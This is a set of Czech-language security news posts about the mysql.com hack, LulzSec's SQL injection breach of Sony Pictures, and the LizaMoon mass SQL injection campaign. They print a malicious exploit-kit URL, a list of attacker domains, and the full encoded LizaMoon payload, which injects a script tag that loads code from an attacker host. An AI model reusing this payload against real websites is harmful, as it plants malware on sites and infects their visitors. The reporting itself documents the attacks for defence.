Mysql.com hacknuto a použito k šíření malware

www.mysql.com hacknuto s použitím SQL injection (detail zde) – nepříliš dobré na tomto incidentu je to, že mysql.com (stejně jako populární MySQL software) patří Oracle (ke kterému se dostalo poté co MySQL koupil Sun Microsystems) a je používáno miliony uživatelů, včetně značného firemního využití.

Útočníci zveřejnili řadu detailů získaných na serveru, včetně kontaktních informací a hesel uživatelů. Vedle SQL injection (vsouvání SQL kódu) bylo na Mysql.com k nalezení ještě XSS (Cross Site Scripting).

Hack byl (nejspíše později) zneužit pro vsunutí škodlivého kódu přesměrovávajícího návštěvníky na web šířící malware.

The mysql.com website is injected with a script that generates an iFrame that redirects the visitors to truruhfhqnviaosdpruejeslsuy.cx.cc/main.php, where the BlackHole exploit pack is hosted. (detailní informace zde)

Přístup k mysql.com byl podle Trend Micro nabízen za 3 000 USD.

Zdroj : MySQL.com Database Compromised By Blind SQL Injection, Mysql.com hacked, serving malware, Underground Radar: Possible Compromise of MySQL.com and its Subdomains

Sony vs. hackeři? Hackeři stále vedou, další hacknutý web Sony

Web Sony Pictures Entertainment hacknut. Podle hackerů pomocí jednoduchého využití SQL injection (vsunutí SQL příkazu). Na internetu tak můžete najít data z hacku, který mimo jiné hackerům poskytl hesla a přihlašovací údaje milionu lidí.

We recently broke into SonyPictures.com and compromised over 1,000,000 users‘  personal information, including passwords, email addresses, home addresses,  dates of birth, and all Sony opt-in data associated with their accounts.  Among other things, we also compromised all admin details of Sony Pictures  (including passwords) along with 75,000 „music codes“ and 3.5 million „music coupons“.

Získané údaje obsahují nejenom přihlašovací informace, ale také adresy, data narození, e-maily a další informace. Hackeři získali i 75 tisíc „music codes“ a 3.5 milionu „music coupons“ – kódů a kuponů, které je možné použít pro nákup hudby.

„Our goal here is not to come across as master hackers, hence what we’re about to reveal: SonyPictures.com was owned by a very simple SQL injection, one of the most primitive and common vulnerabilities, as we should all know by now. From a single injection, we accessed EVERYTHING. Why do you put such faith in a company that allows itself to become open to these simple attacks?“ komentuje hack LulzSec, skupina zodpovědna za hack

Vedle Sony Picture Entertianment se LulzSec podařilo proniknout i do systémů Sony BMG Belgium & Netherlands. A hackům Sony služeb a webů asi není zdaleka konec – je potřeba si uvědomit, že Sony je sice jedna společnost, ale její jednotlivé divize jsou samostatné. A i v jednotlivých zemích zpravidla dochází k tomu, že provozují zcela nezávislé weby a různé služby.

Dění okolo hacknutých služeb Sony tak vypovídá více o stavu firem, které vyvíjejí webové služby, než o samotném Sony. S výjimkou prvního hacku PlayStation Network jsou další hacky často hlavně ukázkou neschopnosti dodavatelů, než samotné Sony.

LizaMoon SQL injection útok stále pokračuje, až 1.5 milionu nakažených stránek

SQL Injection útok pojmenovaný LizaMoon v Google indexu ukazuje už na 559 tisíc nalezených výsledků a TrendLabs upozorňuje na další rozšíření používaných domén.

LizaMoon, Etc. SQL Injection Attack Still Ongoing upozorňuje, že LizaMoon útočníci rozšířili počet domén, které používají pro spouštění útočného kódu. Útoky zatím stále pokračuje a pokud se podíváte na čísla v Google, tak od prvního dubna došlo k zdvojnásobení počtu zjištění nakažených adres. Podle GCN je nakaženo až 1.5 milionu webových stránek.

V ČR jsou viditelné tři nakažené weby – stavebnistandardy.cz, forum.mzh.cz a filatelie-stosek.cz, tady jeden nový od prvního dubna. Napadení počítačů návštěvníků těchto webů podle Trend Micro probíhá pomocí TROJ_FAKEAV.BBK a TROJ_WORID.A. Návštěvník napadené stránky je přesměrován na nabídku falešného antiviru (Windows Stability Center), který se klasickým podvodem snaží uživatele přesvědčit, že jeho počítač je zavirovaný a měl by si pořídit (falešný) antivir. Pokud uživatel nabízený falešný antivir nainstaluje, je ztracen.

Zdroj: Update on LizaMoon mass-injection and Q&A

Počet používaných domén pro útočný skript už jde do desítek

lizamoon.com/ur.php
tadygus.com/ur.php
alexblane.com/ur.php
alisa-carter.com/ur.php
online-stats201.info/ur.php
stats-master111.info/ur.php
agasi-story.info/ur.php
general-st.info/ur.php
extra-service.info/ur.php
t6ryt56.info/ur.php
sol-stats.info/ur.php
google-stats49.info/ur.php
google-stats45.info/ur.php
google-stats50.info/ur.php
stats-master88.info/ur.php
eva-marine.info/ur.php
stats-master99.info/ur.php
worid-of-books.com/ur.php
google-server43.info/ur.php
tzv-stats.info/ur.php
milapop.com/ur.php
pop-stats.info/ur.php
star-stats.info/ur.php
multi-stats.info/ur.php
google-stats44.info/ur.php
books-loader.info/ur.php
google-stats73.info/ur.php
google-stats47.info/ur.php
google-stats50.info/ur.php

WebSense (odkud je také předchozí seznam používaných domén) nabízí i pohled na kód používaný pro SQL Injection, další detaily nabízí Attack on ASP site that uses a SQL server database na StackOverflow.com

+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)
%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)
%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)
%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)
%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)
%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)
%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)
%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)
%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)

+as+varchar(8)))–

Prozatím není jasné jak je SQL Injection využíváno – známé je, že se týká pouze webů používajících Microsoft SQL Server. A také, že nejde o chybu v MSSQL – je využívána chyba v nějakém jiném software, které tyto weby používají.

SQL Injection útok uspěl až na stovkách tisíc adres

Stovky tisíc kompromitovaných webových adres v masivním útoku využívajícím SQL Injection, vsunutí SQL kódu do neošetřeného vstupu webové aplikace. Vsouván je odkaz s útočným skriptem kdy je uživatel přesměrován na podvodné „antivirové“ software.

Chyba při zpracování vstupních parametrů umožňuje útočníkům využít tzv. SQL Injection – vsunutí SQL kódu. Ten se potom spustí ve webové aplikaci a umožní vložit data do SQL serveru. Používá se jako tradiční prostředek pro hacking, ale své využití má už řadu let ve vkládání spamu – zejména odkazů na útočný kód.

K tématu :

Čerstvá vlna útoku vkládá odkaz na JavaScript z domén lizamoon.com a  alisa-carter.com (v obou případech odkaz vede na ur.php a obě domény jsou aktuálně odstavené a nefunkční). Než se útoku podařilo zamezit odstavením používaných domén, odkaz návštěvníka napadeného webu zavedl na nabídku podvodného „antivirového“ software.

Útočný kód se dostal i na tak prominentní místa jako je Apple iTunes – najdete ho na stránkách některých produktů. Nedostal se tam napadením iTunes, ale zvenčí, přes data získávána přes RSS a importovaná do produktových stránek. Útočný kód na iTunes je nefunkční – Apple příchozí RSS zpracovává způsobem, který zamezuje vykonání.

Aktuální vlna útoků je dokumentována websense v LizaMoon mass injection hits over 226,000 URLs (was 28,000) a pohledem do Google můžete snadno zjistit, kolik URL je již v indexu Google  -(aktuálně 292 tisíc pro lizamoon.com variantu a 98 tisíc pro alisa-carter.com variantu). Problém se nevyhnul ani České republice – v indexu Google najdete napadený web StavebniStandardy.cz a filatelie-stoesk.cz.

Velmi pravděpodobně ale existují ještě další varianty umístění útočného skriptu – hledání na ur.php v Google nabízí 291 tisíc výsledku a další rozdílné domény – google-stats50.info, multi-stats.info, google-stat48,info, alexblane.com a řadu dalších.